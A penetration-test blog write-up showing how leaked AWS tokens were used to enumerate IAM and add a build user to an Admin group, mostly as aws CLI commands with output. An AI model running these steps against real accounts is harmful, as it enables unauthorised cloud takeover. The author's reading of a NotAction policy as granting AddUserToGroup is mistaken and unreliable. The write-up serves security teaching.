AWS Privilege Escalation using add user to group.

Posted on Tue 29 October 2019 in cloud-security

Context

During a recent internal pentest, there was a config storage endpoint un-authenticated, allowing to leak some of the tokens for the aws environment.

The token itself was pretty restricted and i was searching for ways to have lateral movement. It was not allowing to list/assume a roles, create/modify/delete users.

We try using the awscli to enumerate and escalate privleges.

Pre-Requisites

  • Install awscli (pip install awscli )
  • aws configure (to map in the credentials you received.)
  • Final ~/.aws/credentials file should look like
[corp]
aws_access_key_id=AXXAXBO3XXRXS6KXXXXX
aws_secret_access_key=XXXXXXXWUBK/GcX5XXbpZXXlmjCT2XXXXX

AWS Privelege Escalation

AWS tokens have the format aws_access_key_id and aws_secret_access_key and can be used to query the AWS API using the aws cli.

  • Trying to get the user details aws iam get-user --profile corp
{
    "User": {
        "Path": "/",
        "UserName": "build@corp.com",
        "UserId": "AXXXXXXXXXXXXXXXXXX",
        "Arn": "arn:aws:iam::1X98XXXXX9:user/build@corp.com",
        "CreateDate": "2019-04-29T16:53:19Z",
        "PasswordLastUsed": "2019-07-29T21:45:55Z"
    }
}

  • Searching if we could list users and allows to list as well: aws iam list-users --profile corp

  • Searching if it allows to list groups and allows to sucessfully list them as well: aws iam list-groups --profile corp

Hmm the list-groups, listed the associated groups with token. The general idea, being if you are able to find a group which has elevated privileges (Administrative/Higher privs), you could go ahead and see if you have the capability to add user to that group if we have iam:AddUserToGroup privileges.

On further inspecting to check if we belong to any group, the result is the user belongs to PowerUsers group

aws iam get-group --group-name PowerUsers --profile corp

{
    "Users": [
        {
            .....
        },
        {
            ....
        },
        {
            ....
        },
        {
            ....
        },
        {
          ....
        },
        {
            "Path": "/",
            "UserName": "build@corp.com",
            "UserId": "AXXXXXXXXXXXXXXX",
            "Arn": "arn:aws:iam::1X9XXXXXXXX09:user/build@corp.com",
            "CreateDate": "2019-04-29T16:53:19Z",
            "PasswordLastUsed": "2019-07-29T21:45:55Z"
        }
    ],
    "Group": {
        "Path": "/",
        "GroupName": "PowerUsers",
        "GroupId": "AXXXXXXXXXXXXXXX",
        "Arn": "arn:aws:iam::17XXXXXXX09:group/PowerUsers",
        "CreateDate": "2016-04-06T04:57:55Z"
    }
}

On checking the permissions for the group PowerUsers

aws iam list-attached-group-policies --group-name PowerUsers --profile corp 

{
    "AttachedPolicies": [
        {
            "PolicyName": "PowerUsers-Policy",
            "PolicyArn": "arn:aws:iam::179856XXXX:policy/PowerUsers-Policy"
        }
    ]
}

aws iam get-policy-version --policy-arn "arn:aws:iam::179856XXXXXXX:policy/PowerUsers-Policy" --version-id 'v1' --profile corp

{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "NotAction": [
                        "iam:ListUsers",
                        "iam:GetUser",
                        "iam:AddUserToGroup",
                        "iam:ListGroupsForUser",
                        "iam:ListUserPolicies",
                        "iam:ListAttachedUserPolicies",
                        "iam:DeleteSigningCertificate",
                        "iam:RemoveUserFromGroup",
                        "iam:DetachUserPolicy",
                        "iam:DeleteUserPolicy"
                    ],
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2016-06-06T13:56:29Z"
    }
}

We have the required permissions with iam:AddUserToGroup showing up. The following list for groups listed shows that there is an Admin group available and on inspecting:

aws iam list-attached-group-policies --group-name Admin --profile corp 

{
    "AttachedPolicies": [
        {
            "PolicyName": "AdministratorAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
        }
    ]
}

Now all we need is to add the user to the group

aws iam add-user-to-group --group-name Admin --user-name build@corp.com --profile corp

Lets verify if the user has been added to the Admin group and has admin privileges.

aws iam get-group --group-name Admin --profile corp

{
    "Users": [
        {
            .....
        },
        {
            ....
        },
        {
            ....
        },
        {
            ....
        },
        {
          ....
        },
        {
            "Path": "/",
            "UserName": "build@corp.com",
            "UserId": "AXXXXXXXXXXXXXXX",
            "Arn": "arn:aws:iam::1X9XXXXXXXX09:user/build@corp.com",
            "CreateDate": "2019-04-29T16:53:19Z",
            "PasswordLastUsed": "2019-07-29T21:45:55Z"
        }
    ],
    "Group": {
        "Path": "/",
        "GroupName": "Admin",
        "GroupId": "AXXXXXXXXXXXXXXX",
        "Arn": "arn:aws:iam::17XXXXXXX09:group/Admin",
        "CreateDate": "2016-04-06T04:57:55Z"
    }
}

Conclusion

AWS IAM policy configs being messed up is a high chance, and one should always try escalating privileges after obtaining a token.

These methods are not novel and are extensively covered in the AWS IAM privilege escalation blogpost, i tried using PACU to automate the attack but it couldn't find a way and hence relied on manual ways with some reading up of documentation on the awscli and permissions.

References

  • https://docs.aws.amazon.com/cli/latest/reference/iam/
  • https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation

aws pentest aws privilege escalation awscli privilege aws security